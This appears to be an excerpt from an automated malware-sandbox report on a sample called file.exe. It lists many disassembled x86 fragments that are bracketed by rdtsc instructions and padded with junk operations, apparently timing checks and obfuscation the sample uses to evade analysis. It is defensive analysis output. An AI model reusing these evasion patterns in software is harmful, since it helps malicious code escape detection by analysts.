Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF8019 second address: FF8061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D2215h], ecx 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 mov di, ax 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F67208644C8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jno 00007F67208644CCh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF8061 second address: FF8066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFAEE0 second address: FFAF2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jp 00007F67208644C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov bx, C812h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F67208644C8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17DDh], edx 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jg 00007F67208644C6h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFAF2B second address: FFAF2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFBE9E second address: FFBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFBEA3 second address: FFBEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFBF1E second address: FFBF22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFDD6F second address: FFDD79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFED6E second address: FFED74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFDEAC second address: FFDED5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533115h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F672053310Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FFDED5 second address: FFDEDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: 1001F22 second address: 1001F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002FFC second address: 1003017 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F67208644CCh 0x00000008 jnl 00007F67208644C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F67208644CCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000F30 second address: 1000FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F6720533108h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D31FDh], ecx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F6720533108h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D0D55h] 0x00000059 sbb bl, FFFFFFF4h 0x0000005c push FFFFFFFFh 0x0000005e mov ebx, 788436FEh 0x00000063 nop 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 pop ecx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003017 second address: 100301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004069 second address: 10040DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 or di, 532Bh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F6720533108h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov di, bx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F6720533108h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jg 00007F672053310Bh 0x0000004c jnl 00007F672053310Bh 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F672053310Dh 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F88 second address: 1004F92 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F92 second address: 100501C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F672053310Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F6720533108h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jc 00007F6720533111h 0x0000002c jmp 00007F672053310Bh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F6720533108h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d sub ebx, 134DC0BDh 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 mov ebx, dword ptr [ebp+122D29F4h] 0x0000005c pop ebx 0x0000005d xchg eax, esi 0x0000005e pushad 0x0000005f jmp 00007F672053310Dh 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10060D7 second address: 10060E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10060E8 second address: 10060FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6720533110h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008036 second address: 100806B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+1244C0C1h], ecx 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D36F5h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b jmp 00007F67208644D1h 0x00000020 pop edi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100806B second address: 1008070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008070 second address: 1008075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008075 second address: 100807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10081A8 second address: 10081AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10081AE second address: 10081B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10091D3 second address: 10091D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10091D7 second address: 10091DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10091DD second address: 10091E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010718 second address: 1010731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F672053310Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007F6720533106h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010731 second address: 1010763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F67208644C6h 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F67208644C6h 0x0000001e jmp 00007F67208644D4h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010894 second address: 10108C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F672053310Eh 0x0000000a jmp 00007F6720533118h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010A4E second address: 1010A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F67208644C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jbe 00007F67208644C8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010A63 second address: 1010A9A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6720533118h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6720533110h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F6720533125h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007F6720533111h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A102 second address: 100A107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A1FC second address: 100A200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A200 second address: 100A206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C60C second address: 101C624 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6720533106h 0x00000008 jno 00007F6720533106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F6720533112h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C8A9 second address: 101C8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C8AD second address: 101C8E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6720533106h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6720533115h 0x00000014 push edi 0x00000015 jmp 00007F6720533112h 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C8E5 second address: 101C921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F67208644D5h 0x0000000e jmp 00007F67208644CDh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C921 second address: 101C925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101CA81 second address: 101CAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F67208644D1h 0x0000000d jmp 00007F67208644CBh 0x00000012 pushad 0x00000013 jmp 00007F67208644D3h 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D02F second address: 101D035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10238F5 second address: 1023908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67208644CFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023908 second address: 102390C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102390C second address: 1023925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67208644CEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023925 second address: 102392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022327 second address: 1022345 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67208644CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jl 00007F67208644C6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A51 second address: 1022A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A57 second address: 1022A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A5D second address: 1022A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A66 second address: 1022A99 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F67208644D7h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jl 00007F67208644C6h 0x00000019 jg 00007F67208644C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A99 second address: 1022AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F672053310Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d jne 00007F6720533106h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102302A second address: 1023034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F67208644C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023034 second address: 1023038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023038 second address: 1023044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023044 second address: 1023048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023048 second address: 102304E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102319F second address: 10231B4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6720533108h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F672053311Eh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10231B4 second address: 10231C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 jne 00007F67208644CEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023789 second address: 10237AC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F672053310Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F6720533110h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021FEB second address: 1022007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jo 00007F67208644C6h 0x0000000e jc 00007F67208644C6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022007 second address: 1022014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F6720533106h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022014 second address: 1022018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022018 second address: 102202C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F6720533106h 0x0000000e jp 00007F6720533106h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10269CF second address: 10269EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F67208644C6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10269EA second address: 10269FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CE62 second address: 102CE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CE66 second address: 102CE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F672053310Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F6720533116h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CE93 second address: 102CEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F67208644D3h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d jnp 00007F67208644C6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F67208644C6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CEBD second address: 102CEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF050D second address: FF051D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 js 00007F67208644C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF051D second address: FF052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F672053310Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF052A second address: FD5B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov cx, dx 0x00000009 call dword ptr [ebp+122D2D25h] 0x0000000f jc 00007F67208644DEh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF05EA second address: FF05F4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0AAB second address: FF0AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0C7B second address: FF0C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0C86 second address: FF0C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DB1 second address: FF0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DC0 second address: FF0DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DC4 second address: FF0DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DC8 second address: FF0DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
